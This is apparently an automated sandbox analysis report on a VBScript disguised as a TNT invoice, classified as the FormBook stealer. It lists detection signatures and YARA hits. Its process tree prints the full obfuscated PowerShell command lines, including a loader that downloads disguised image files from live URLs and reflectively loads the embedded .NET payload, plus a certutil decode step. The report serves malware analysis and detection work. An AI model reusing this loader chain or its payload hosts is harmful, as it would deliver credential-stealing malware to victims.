Edit tour

Windows Analysis Report
TNT Invoicing_pdf.vbs

Overview

General Information

Sample name:	TNT Invoicing_pdf.vbs
Analysis ID:	1427200
MD5:	dc730ce99454b09b0cdb56ad864393a1
SHA1:	221a2f95154e2bce9723c5f19d6136984549f745
SHA256:	875354779fb810fdab20845476e3e312f030edf58dcc043b2ea8ac566d95fd9b
Tags:	vbs
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses certutil -decode

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 2616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBmDgTreGcDgTreLwBlDgTreGMDgTreYQByDgTreGcDgTreLwBwDgTreG8DgTreaDgTreBzDgTreC4DgTrebQBvDgTreG4DgTrebwBjDgTreG4DgTreYQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBNDgTreFMDgTreQgB1DgTreGkDgTrebDgTreBkDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)

MSBuild.exe (PID: 4600 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

SYYSBomrTxWSggG.exe (PID: 3432 cmdline: "C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

SyncHost.exe (PID: 4132 cmdline: "C:\Windows\SysWOW64\SyncHost.exe" MD5: 59E810FBB9C5676F7FE2BA8820B616FF)

SYYSBomrTxWSggG.exe (PID: 2988 cmdline: "C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

certutil.exe (PID: 2156 cmdline: "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe" MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4032 cmdline: "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13a6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3a8450:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x391acf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13a6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f0b1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28730:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3a8450:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x391acf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13a6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 2616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2616	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfdf9d:$b2: ::FromBase64String( 0x100862:$b2: ::FromBase64String( 0x101d32:$b2: ::FromBase64String( 0x10234b:$b2: ::FromBase64String( 0x102a86:$b2: ::FromBase64String( 0x103056:$b2: ::FromBase64String( 0xfde02:$b3: ::UTF8.GetString( 0x1006c7:$b3: ::UTF8.GetString( 0x101b97:$b3: ::UTF8.GetString( 0x1021b0:$b3: ::UTF8.GetString( 0x1028eb:$b3: ::UTF8.GetString( 0x102ebb:$b3: ::UTF8.GetString( 0xf79a4:$s1: -join 0x136459:$s1: -join 0x153ee:$s3: reverse 0x156dc:$s3: reverse 0x15df6:$s3: reverse 0x165af:$s3: reverse 0x1d74a:$s3: reverse 0x1db64:$s3: reverse 0x1e6ec:$s3: reverse
Process Memory Space: powershell.exe PID: 5804	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5804	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x56c:$b2: ::FromBase64String( 0xd02:$b2: ::FromBase64String( 0x7fa62:$b2: ::FromBase64String( 0x8002f:$b2: ::FromBase64String( 0x80825:$b2: ::FromBase64String( 0x80fad:$b2: ::FromBase64String( 0x825ff:$b2: ::FromBase64String( 0x82bc4:$b2: ::FromBase64String( 0x84233:$b2: ::FromBase64String( 0x8c799:$b2: ::FromBase64String( 0x97a10:$b2: ::FromBase64String( 0x9adb8:$b2: ::FromBase64String( 0x9b37d:$b2: ::FromBase64String( 0x9c3a1:$b2: ::FromBase64String( 0x174cb0:$b2: ::FromBase64String( 0x175203:$b2: ::FromBase64String( 0x3d1:$b3: ::UTF8.GetString( 0xb67:$b3: ::UTF8.GetString( 0x7f8c7:$b3: ::UTF8.GetString( 0x7fe94:$b3: ::UTF8.GetString( 0x8068a:$b3: ::UTF8.GetString(
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
10.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.MSBuild.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Other

Source	Rule	Description	Author	Strings
amsi64_5804.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

